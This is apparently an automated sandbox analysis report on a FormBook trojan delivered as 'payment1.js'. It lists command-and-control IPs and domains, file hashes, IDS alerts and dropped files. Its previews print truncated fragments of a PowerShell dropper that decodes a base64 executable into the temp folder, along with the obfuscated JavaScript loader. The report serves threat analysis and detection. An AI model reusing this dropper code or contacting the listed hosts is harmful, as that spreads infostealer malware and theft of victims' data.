                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:12
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:2
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • GSI enabled (Javascript)
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:payment1.js
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.expl.evad.winJS@14/8@6/6
                                                                        EGA Information:
                                                                        • Successful, ratio: 60%
                                                                        HCA Information:
                                                                        • Successful, ratio: 95%
                                                                        • Number of executed functions: 113
                                                                        • Number of non-executed functions: 262
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .js

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target powershell.exe, PID 5352 because it is empty
                                                                        • Execution Graph export aborted for target sxkv2RIDKUVCF4X010eCnC.exe, PID 4108 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        02:14:25API Interceptor6x Sleep call for process: powershell.exe modified
                                                                        02:15:29API Interceptor1613650x Sleep call for process: MRINFO.EXE modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        104.21.16.1PO from tpc Type 34.1 34,2 35 Spec.jsGet hashmaliciousFormBookBrowse
                                                                        • www.lucynoel6465.shop/jgkl/
                                                                        PO from tpc Type 34.1 34,2 35 Spec 1.jsGet hashmaliciousFormBookBrowse
                                                                        • www.tumbetgirislinki.fit/k566/
                                                                        ebu.ps1Get hashmaliciousFormBookBrowse
                                                                        • www.fz977.xyz/48bq/
                                                                        BIS_MT103 101T000000121121.exeGet hashmaliciousFormBookBrowse
                                                                        • www.cheapwil.shop/ekxu/
                                                                        crypt.exeGet hashmaliciousFormBookBrowse
                                                                        • www.clouser.store/0izs/
                                                                        ReODK2A5DB.exeGet hashmaliciousFormBookBrowse
                                                                        • www.sigaque.today/n61y/
                                                                        xBA5hw2TjG.exeGet hashmaliciousFormBookBrowse
                                                                        • www.fz977.xyz/406r/
                                                                        jKR1K8ayHT.exeGet hashmaliciousFormBookBrowse
                                                                        • www.axis138ae.shop/do5s/
                                                                        greatnamechangedwithgoodnews.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                        • www.shlomi.app/r0jq/
                                                                        http://dryade.cutegreetingcakes.com/ga/click/2-263541735-21475-52792-103465-64017-800122d652-72691c1ea5Get hashmaliciousUnknownBrowse
                                                                        • dryade.cutegreetingcakes.com/ga/click/2-263541735-21475-52792-103465-64017-800122d652-72691c1ea5
                                                                        13.248.169.482024-02-17.jsGet hashmaliciousFormBookBrowse
                                                                        • www.allenamento.xyz/6q5z/
                                                                        PO.exeGet hashmaliciousFormBookBrowse
                                                                        • www.bitcoinescort.xyz/oodw/
                                                                        ORD_VIO-002-2025e-O001.exeGet hashmaliciousFormBookBrowse
                                                                        • www.publicblockchain.xyz/6wak/
                                                                        SFT20020117.exeGet hashmaliciousFormBookBrowse
                                                                        • www.pembukaan.xyz/dmuh/
                                                                        QUOTE OF DRY DOCK REPAIR.exeGet hashmaliciousFormBookBrowse
                                                                        • www.autonomousrich.xyz/5l58/
                                                                        PO# 81136575.exeGet hashmaliciousFormBookBrowse
                                                                        • www.zkderby.xyz/t73m/
                                                                        QUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                                        • www.hugeblockchain.xyz/tq56/
                                                                        Revised Order Confirmation.exeGet hashmaliciousFormBookBrowse
                                                                        • www.melengkung.xyz/fe9y/
                                                                        SHIPMENT OF THE ORIGINAL DOCUMENTS.exeGet hashmaliciousFormBookBrowse
                                                                        • www.blockchaindapps.xyz/vf8y/
                                                                        SWIFT COPY.jsGet hashmaliciousFormBookBrowse
                                                                        • www.bitcoinvendor.xyz/clt8/

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        www.physicsbrain.xyzQUOTE OF DRY DOCK REPAIR.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        SWIFT COPY.jsGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        CUD--Quotation list.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        DHL AWB.jsGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        SOA - Final Payment.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        QCX ender user 2025.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        SOA - Final Payment.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        SOA-CAVER.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        DHL.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        BJKzw4jO7c.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        www.dqvcbn.infoSWIFT COPY.jsGet hashmaliciousFormBookBrowse
                                                                        • 47.83.1.90
                                                                        DHL AWB.jsGet hashmaliciousFormBookBrowse
                                                                        • 47.83.1.90
                                                                        DHL.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                        • 47.83.1.90
                                                                        PAYMENT.jsGet hashmaliciousFormBookBrowse
                                                                        • 47.83.1.90
                                                                        PAYMENT.jsGet hashmaliciousFormBookBrowse
                                                                        • 47.83.1.90
                                                                        SecuriteInfo.com.FileRepMalware.27444.30572.exeGet hashmaliciousFormBookBrowse
                                                                        • 47.83.1.90
                                                                        www.weilaishijie.xyzSWIFT COPY.jsGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        new quotation.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        DHL AWB.jsGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        payment transfer form.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        Payment Swift Copy 76432650263970239=.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        Demande de devis. Quote Request.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        Documents.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        swift copy.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        Purchase Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        www.travel-cure.sbs2024-02-17.jsGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.160
                                                                        PO.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.160
                                                                        SWIFT COPY.jsGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.160
                                                                        2025-02-14.jsGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.160
                                                                        ebu.ps1Get hashmaliciousFormBookBrowse
                                                                        • 199.59.243.160
                                                                        DHL AWB.jsGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.160
                                                                        AGODA COMPANY PTE LTD.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.160
                                                                        Bank Transfer Accounting Copy.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.160
                                                                        (BBVA) SWIFT_consulta_de_operaciones 10-02-2025-PDF.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.160
                                                                        AGODA COMPANY PTE LTD.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.160

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSPO from tpc Type 34.1 34,2 35 Spec.jsGet hashmaliciousFormBookBrowse
                                                                        • 104.21.32.1
                                                                        nDHL_CUSTOM_CLEARANCE_FORM_3409249_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 172.67.168.33
                                                                        DHL AWB Document_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 104.21.32.1
                                                                        PO from tpc Type 34.1 34,2 35 Spec 1.jsGet hashmaliciousFormBookBrowse
                                                                        • 104.21.112.1
                                                                        2024-02-17.jsGet hashmaliciousFormBookBrowse
                                                                        • 172.67.207.50
                                                                        useeeerrrrr.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.80.1
                                                                        PO.exeGet hashmaliciousFormBookBrowse
                                                                        • 104.21.64.1
                                                                        15300429772_20250121_09114163_HesapOzeti.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.80.1
                                                                        Quotation.xlsGet hashmaliciousUnknownBrowse
                                                                        • 104.21.96.1
                                                                        Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 188.114.96.3
                                                                        NAMECHEAP-NETUSPO.exeGet hashmaliciousFormBookBrowse
                                                                        • 198.187.31.216
                                                                        ORD_VIO-002-2025e-O001.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.38.223
                                                                        QUOTE OF DRY DOCK REPAIR.exeGet hashmaliciousFormBookBrowse
                                                                        • 192.64.118.221
                                                                        PO# 81136575.exeGet hashmaliciousFormBookBrowse
                                                                        • 162.0.231.203
                                                                        QUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                                        • 162.0.231.203
                                                                        SHIPMENT OF THE ORIGINAL DOCUMENTS.exeGet hashmaliciousFormBookBrowse
                                                                        • 162.0.231.203
                                                                        play.wav.htmGet hashmaliciousHtmlDropperBrowse
                                                                        • 162.0.229.203
                                                                        SWIFT COPY.jsGet hashmaliciousFormBookBrowse
                                                                        • 162.0.231.203
                                                                        SCAN RC INV 92_0225 SHEETS.exeGet hashmaliciousFormBookBrowse
                                                                        • 162.0.231.203
                                                                        kzTq7Bt.exeGet hashmaliciousUnknownBrowse
                                                                        • 198.54.120.127
                                                                        AMAZON-02US2024-02-17.jsGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        PO.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        ORD_VIO-002-2025e-O001.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        file.lnkGet hashmaliciousUnknownBrowse
                                                                        • 52.222.236.19
                                                                        file.lnkGet hashmaliciousUnknownBrowse
                                                                        • 52.222.236.76
                                                                        Hilix.sh4.elfGet hashmaliciousUnknownBrowse
                                                                        • 54.112.132.3
                                                                        Xw9oZv75Ze.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                        • 18.244.18.122
                                                                        Hilix.arm5.elfGet hashmaliciousUnknownBrowse
                                                                        • 54.171.230.55
                                                                        Hilix.arm7.elfGet hashmaliciousMiraiBrowse
                                                                        • 54.245.42.226
                                                                        res.mips.elfGet hashmaliciousUnknownBrowse
                                                                        • 3.186.179.89
                                                                        BODIS-NJUS2024-02-17.jsGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.160
                                                                        PO.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.228
                                                                        UPDATED SOA.pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.228
                                                                        PO# 81136575.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.228
                                                                        QUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.228
                                                                        SHIPMENT OF THE ORIGINAL DOCUMENTS.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.228
                                                                        SWIFT COPY.jsGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.160
                                                                        Order inquiry.pif.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.228
                                                                        http://ndax--sso--auth-io.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 199.59.243.227
                                                                        2025-02-14.jsGet hashmaliciousFormBookBrowse
                                                                        • 199.59.243.228

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Temp\dddddd.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\wscript.exe
                                                                        File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):551032
                                                                        Entropy (8bit):5.9774318682873515
                                                                        Encrypted:false
                                                                        SSDEEP:12288:7ghV31GpYb4GEaIwtZVG1KwZfyuOqI+jXu65tk40B7DfaP8n3KO8Lc0:7ghV3nbGwzE1KwxE0CDnj6W0
                                                                        MD5:6A6E89ED295636FFFE48E8BA04095DF9
                                                                        SHA1:BE0CAC2911DB15806D12E78B80348A9AFC8E5819
                                                                        SHA-256:1C5AD5AC70F96CEAE6FC8A6D8762A0C9D61581D0EF5765D4B2BAC04463A5C736
                                                                        SHA-512:B1A1B448741DBC0A1A1367F9F8B92B7C5A5FFCBE45513EA7CAB09EB0495D896C93CB8500F3260CF57257F2985B88A0905B89344ECD011B7DC81CCE8D75FC61BD
                                                                        Malicious:true
                                                                        Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAK0etGcAAAAAAAAAAOAADgELATAAAEQGAABKBgAAAAAAymMGAAAgAAAAgAYAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADABgAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAHBjBgBXAAAAAKAGAIgFAAAAAAAAAAAAAAAAAAAAAAAAAIAGAAwAAADI+QUAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA0EMGAAAgAAAARAYAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAgAYAAAIAAABGBgAAAAAAAAAAAAAAAABAAABCLnJzcmMAAACIBQAAAKAGAAAGAAAASAYAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAACsYwYAAAAAAEgAAAACAAUAOPoFADhpAAADAAAABAAABqRIAAAksQUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIAKB0AAAYAKgAAAAMwCQAIAAAAAAAAAAIoEAAABgAqEzAEAE8AAAABAAARcyUAAAYKBij4AAAGJSZ9BgAABAYCfQcAAAQGA30IAAAEBgR9CQAAB

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):226
                                                                        Entropy (8bit):5.360398796477698
                                                                        Encrypted:false
                                                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                        MD5:3A8957C6382192B71471BD14359D0B12
                                                                        SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                        SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                        SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\popo[1].ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\wscript.exe
                                                                        File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):551032
                                                                        Entropy (8bit):5.9774318682873515
                                                                        Encrypted:false
                                                                        SSDEEP:12288:7ghV31GpYb4GEaIwtZVG1KwZfyuOqI+jXu65tk40B7DfaP8n3KO8Lc0:7ghV3nbGwzE1KwxE0CDnj6W0
                                                                        MD5:6A6E89ED295636FFFE48E8BA04095DF9
                                                                        SHA1:BE0CAC2911DB15806D12E78B80348A9AFC8E5819
                                                                        SHA-256:1C5AD5AC70F96CEAE6FC8A6D8762A0C9D61581D0EF5765D4B2BAC04463A5C736
                                                                        SHA-512:B1A1B448741DBC0A1A1367F9F8B92B7C5A5FFCBE45513EA7CAB09EB0495D896C93CB8500F3260CF57257F2985B88A0905B89344ECD011B7DC81CCE8D75FC61BD
                                                                        Malicious:false
                                                                        Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAK0etGcAAAAAAAAAAOAADgELATAAAEQGAABKBgAAAAAAymMGAAAgAAAAgAYAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADABgAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAHBjBgBXAAAAAKAGAIgFAAAAAAAAAAAAAAAAAAAAAAAAAIAGAAwAAADI+QUAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA0EMGAAAgAAAARAYAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAgAYAAAIAAABGBgAAAAAAAAAAAAAAAABAAABCLnJzcmMAAACIBQAAAKAGAAAGAAAASAYAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAACsYwYAAAAAAEgAAAACAAUAOPoFADhpAAADAAAABAAABqRIAAAksQUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIAKB0AAAYAKgAAAAMwCQAIAAAAAAAAAAIoEAAABgAqEzAEAE8AAAABAAARcyUAAAYKBij4AAAGJSZ9BgAABAYCfQcAAAQGA30IAAAEBgR9CQAAB

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1940658735648508
                                                                        Encrypted:false
                                                                        SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                                                        MD5:DA1F22117B9766A1F0220503765A5BA5
                                                                        SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                                                        SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                                                        SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                                                        Malicious:false
                                                                        Preview:@...e.................................R..............@..........

                                                                        C:\Users\user\AppData\Local\Temp\5-A-10M

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\MRINFO.EXE
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rldydruw.t51.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzuop3dl.jo2.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\x.exe

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):413184
                                                                        Entropy (8bit):7.9357372035738
                                                                        Encrypted:false
                                                                        SSDEEP:12288:93EXwT/ZGtI7TVDQXBlNlUKDYC5X00vo82:dviMTVMXBlNmKE+XJQ8
                                                                        MD5:FEC299680E47D0901C60D84DD11EFC55
                                                                        SHA1:01663B35860B6E845F6D2A36A607F97D7F6AA185
                                                                        SHA-256:506D591BE3AE904CD52B172BE69B3CC51C570AF62B35B23666430DC965A5A118
                                                                        SHA-512:12B180C984DD2855A3D036A7E525D0CA1DF207FF6A518D3127B9BFC26B5EF60705197B45D7D0079C727ED8B1550DA5980A37C906B52248A45BED099A74D174F6
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0..D...J.......c... ........@.. ....................................`.................................pc..W.................................................................................... ............... ..H............text....C... ...D.................. ..`.reloc...............F..............@..B.rsrc................H..............@..@.................c......H.......8...8i...........H..$...........................................".(.....*....0...........(.....*.0..O.......s%.....(....%&}......}......}......}......(*...}.....|......(...+.|....(u...%&*..0..E.........(1...%&(/.....B(1...%&(/...%&..[(1...%&....(....%&(J...%&...(.....*....0............(/...%&....($....+..*..0............(*....8f.....(......(....%&.(*.........,'.E.........-......& ....(1...%&(....%&z...(*...(d...%&.....(*...X(d...%&.(....%&...(*..........{.......(*....

                                                                        Static File Info

                                                                        General

                                                                        File type:ASCII text, with very long lines (6696), with no line terminators
                                                                        Entropy (8bit):5.578028086864442
                                                                        TrID:
                                                                        • Java Script (8504/1) 100.00%
                                                                        File name:payment1.js
                                                                        File size:6'696 bytes
                                                                        MD5:2654bc864c7151909126b25ea1c81b76
                                                                        SHA1:5ed041b8271952bdeb234412d57b08d62a2d76d5
                                                                        SHA256:c7416d2226ba27764dc40ad2b8288e051f7f40f116f5995388a3a88e55c4006f
                                                                        SHA512:0a3147b19d8ed6e2260be0d15385e98cb717ef34ac4157b5752c0328b8ce8eac81b806daa86af8039411634d3375266b29f033752a6101ef7b4a06256f6b3042
                                                                        SSDEEP:192:WOXm/Oy5y8BbUYBCO+dmHwYLBCTdCmRtUcDjOGEkCzvo:kOX8lUYBCOhwKMdDF1CA
                                                                        TLSH:F2D162443BD4A08537D75F67772B20D4F99D9C87AAE58C4FE854EC40EE805A0DED1938
                                                                        File Content Preview:var _0x36bb1e=_0x5598,_0x165511=_0x2aa5,_0x429836=_0xe32f;function _0x3d8f(){var _0x1bc8c2=['MSXML2.XMLHTTP','371190cReolU','rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU','q3jLyxrLt2jQzwn0','bab4W6tdK8oJrG','W4iJW43dGGa8W5i7W40iWOVcRq4','message',

                                                                        File Icon

                                                                        Icon Hash:68d69b8bb6aa9a86

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2025-02-18T08:14:24.465469+01002018856ET MALWARE Windows executable base64 encoded1196.251.92.6480192.168.2.449731TCP
                                                                        2025-02-18T08:15:08.251077+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.452381104.21.16.180TCP
                                                                        2025-02-18T08:15:23.924194+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.452479199.59.243.16080TCP
                                                                        2025-02-18T08:15:26.471184+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.452495199.59.243.16080TCP
                                                                        2025-02-18T08:15:29.004663+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.452511199.59.243.16080TCP
                                                                        2025-02-18T08:15:31.565835+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.452532199.59.243.16080TCP
                                                                        2025-02-18T08:15:37.053621+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45256813.248.169.4880TCP
                                                                        2025-02-18T08:15:39.727711+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45258413.248.169.4880TCP
                                                                        2025-02-18T08:15:42.257629+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45260013.248.169.4880TCP
                                                                        2025-02-18T08:15:44.793153+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45261913.248.169.4880TCP
                                                                        2025-02-18T08:15:50.453083+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.452656162.0.231.20380TCP
                                                                        2025-02-18T08:15:52.974967+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.452657162.0.231.20380TCP
                                                                        2025-02-18T08:15:55.550608+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.452658162.0.231.20380TCP
                                                                        2025-02-18T08:15:58.061120+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.452659162.0.231.20380TCP
                                                                        2025-02-18T08:16:03.677240+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45266013.248.169.4880TCP
